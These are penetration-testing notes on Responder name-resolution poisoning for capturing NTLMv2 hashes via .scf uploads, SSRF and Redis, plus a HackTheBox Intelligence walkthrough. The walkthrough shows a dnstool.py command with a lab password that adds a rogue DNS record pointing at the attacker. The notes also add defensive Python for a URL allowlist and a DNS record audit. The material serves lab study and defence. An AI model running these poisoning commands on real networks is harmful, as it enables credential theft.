We basically poison name resolution so that whenever a host does not know where to send a connection (the DNS lookup fails and it falls back to broadcast name resolution), it ends up sending that connection to us.
Responder:
responder -I <tun0> -dw
## This will capture NTLMv2 hashes that can be cracked with hashcat.
Different strategies to get NTLMv2 hashes:
If there is anywhere we can upload a file and .scf files are accepted, we can replace the file with one that calls back to the SMB share hosted by Responder; the captured hash can then be cracked.
Note the SMB share path inside the file: the IP has to be switched to our own.
SSRF + Responder
Server-Side Request Forgery (SSRF) allows an attacker to "induce" the application to make requests to places it was not intended to reach.
Here the application was some sort of web browser, which let us intercept the traffic by pointing the website at our web server, with Responder listening.
Notice that we gave the application the URL of our web server on port 80 (of course, since HTTPS is encrypted, we would not be able to do this over HTTPS). That was enough to take advantage of the SSRF.
Same concept here: if we can point Redis at our SMB share, we will be able to capture hashes as well.
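The common thread in the .scf, SSRF and Redis cases above is a server or client component that will open whatever UNC path or URL it is handed and authenticate to it. The following is an added example, not code from the original notes: a destination policy check that an application can run before following a user-controlled URL or UNC path. The allowlisted hosts and the 10.10.10.0/24 server range are constructed for the example; the only page-derived value is the 10.10.14.7 attacker address used as a sample input.

```python
"""Added example (not from the original notes): a destination policy for
application-initiated requests, the kind of check that stops the SSRF and the
UNC call-backs described above.

Assumptions (constructed): the application only ever needs to reach the hosts
and ranges listed below, and it must never follow a UNC path or URL to a host
it did not already trust.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist of hosts the application legitimately talks to.
ALLOWED_HOSTS = {"intranet.intelligence.htb", "fileserver.intelligence.htb"}
# Constructed internal server range; IP literals outside it are rejected.
ALLOWED_NETS = [ipaddress.ip_network("10.10.10.0/24")]


def _host_allowed(host: str) -> bool:
    """True if host is an allowlisted name or an IP inside the server ranges."""
    host = host.lower().rstrip(".")
    if host in ALLOWED_HOSTS:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # unknown hostname that is not an IP literal: reject
    return any(ip in net for net in ALLOWED_NETS)


def check_destination(target: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a URL or UNC path the app was asked to open.

    UNC paths (\\\\host\\share) are only followed to allowlisted hosts.
    URLs must use https (so the remote side has to present a trusted
    certificate) and point at an allowlisted host; embedded credentials
    are refused outright.
    """
    if target.startswith("\\\\"):
        parts = target.split("\\")
        host = parts[2] if len(parts) > 2 else ""
        if _host_allowed(host):
            return True, f"UNC host {host} is allowlisted"
        return False, f"UNC path to unapproved host {host!r}"

    parts = urlsplit(target)
    if parts.scheme != "https":
        return False, f"scheme {parts.scheme!r} not allowed (https only)"
    host = parts.hostname or ""
    if not _host_allowed(host):
        return False, f"host {host!r} not allowlisted"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    return True, f"https request to {host} permitted"


if __name__ == "__main__":
    # Constructed sample inputs: the attacker-style ones should all be refused.
    for t in ("http://10.10.14.7/",
              "\\\\10.10.14.7\\share\\icon.ico",
              "https://intranet.intelligence.htb/status",
              "\\\\fileserver.intelligence.htb\\icons"):
        print(t, "->", check_destination(t))
```

The allowlist is the control that actually matters; the https requirement is there so that an unknown endpoint cannot be reached just by using a plain `http://` URL on port 80, which is exactly how the SSRF above was used.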
Poisoning DNS and Default Cred Web request
During the machine called Intelligence from HackTheBox I was able to capture a hash because a user was making a request to every web server whose name started with the word "web".
The script the user was running to authenticate looked like this:
File: downdetector.ps1 (UTF-16LE)

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        # -UseDefaultCredentials sends the running user's credentials to whatever host the record points at
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
We can use the requests it makes to the web servers whose names start with web*.
If we have valid credentials to the domain, we can stand up our own web server and poison DNS so that a record starting with that name points to us, and then capture the hash of the user Ted Graves.
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -r weblyethar -a add -t A -d 10.10.14.7 10.10.10.248
Note that -d takes the address the new record should resolve to (our IP); the final argument is the IP of the target domain controller.
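The weakness the script above exposes is that a `web*` wildcard match in ADIDNS is only as trustworthy as the account that created each record, and by default any authenticated domain user can add records to the zone. As an added example (not part of the original notes or of the Intelligence box), the following audit flags `web*` records that a monitoring script would trust but which look attacker-created. The record export format, the inventory, the privileged-owner set and the 10.10.10.0/24 server range are all constructed for this example; the field names are this example's own and are not LDAP attribute names. The sample rogue record reuses the names and addresses from the dnstool.py command above.

```python
"""Added example (not from the original notes): an audit of Active Directory
integrated DNS (ADIDNS) records that flags entries a script like
downdetector.ps1 would trust but which look attacker-created.

Assumptions (constructed): records were exported from the zone with their
owner and creation time into DnsRecord objects; KNOWN_WEB_HOSTS is the set of
web servers the DNS admins actually registered. Field names are this example's
own, not LDAP attributes.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import fnmatch
import ipaddress


@dataclass
class DnsRecord:
    name: str          # dnsNode name, e.g. "web01"
    rtype: str         # record type, e.g. "A"
    data: str          # record data, e.g. "10.10.10.50"
    owner: str         # account that created the object
    created: datetime  # creation time of the object


# Constructed inventory and policy.
KNOWN_WEB_HOSTS = {"web01", "web02"}
PRIVILEGED_OWNERS = {"INTELLIGENCE\\Administrator", "INTELLIGENCE\\DC$"}
SERVER_NETS = [ipaddress.ip_network("10.10.10.0/24")]
PATTERN = "web*"  # the same wildcard the monitoring script trusts


def audit_records(records, now, recent=timedelta(days=7)):
    """Return a list of (record, reasons) for PATTERN matches worth a look.

    A record is flagged when it is not in the inventory, was created by a
    non-privileged account, or its A record points outside the server ranges.
    Recent creation is appended as extra context, never as the sole reason.
    """
    findings = []
    for r in records:
        if not fnmatch.fnmatch(r.name.lower(), PATTERN):
            continue
        reasons = []
        if r.name.lower() not in KNOWN_WEB_HOSTS:
            reasons.append("not in inventory")
        if r.owner not in PRIVILEGED_OWNERS:
            reasons.append(f"created by non-privileged account {r.owner}")
        if r.rtype == "A":
            ip = ipaddress.ip_address(r.data)
            if not any(ip in net for net in SERVER_NETS):
                reasons.append(f"points outside server ranges ({r.data})")
        if reasons:
            if now - r.created < recent:
                reasons.append(f"created within the last {recent.days} days")
            findings.append((r, reasons))
    return findings


# Constructed sample export: three legitimate records and one rogue one.
NOW = datetime(2021, 7, 12, 9, 0)
SAMPLE_RECORDS = [
    DnsRecord("web01", "A", "10.10.10.50", "INTELLIGENCE\\Administrator", NOW - timedelta(days=400)),
    DnsRecord("web02", "A", "10.10.10.51", "INTELLIGENCE\\Administrator", NOW - timedelta(days=400)),
    DnsRecord("dc", "A", "10.10.10.248", "INTELLIGENCE\\DC$", NOW - timedelta(days=400)),
    # Added by a regular user an hour ago and pointing at a non-server address.
    DnsRecord("weblyethar", "A", "10.10.14.7", "INTELLIGENCE\\Tiffany.Molina", NOW - timedelta(hours=1)),
]


if __name__ == "__main__":
    for rec, why in audit_records(SAMPLE_RECORDS, NOW):
        print(f"{rec.name} -> {rec.data}: " + "; ".join(why))
```

Run against the constructed export, only `weblyethar` is reported, with all four reasons. Restricting who may create records in the zone, or replacing the `web*` wildcard with an explicit inventory, removes the class of problem the audit is looking for.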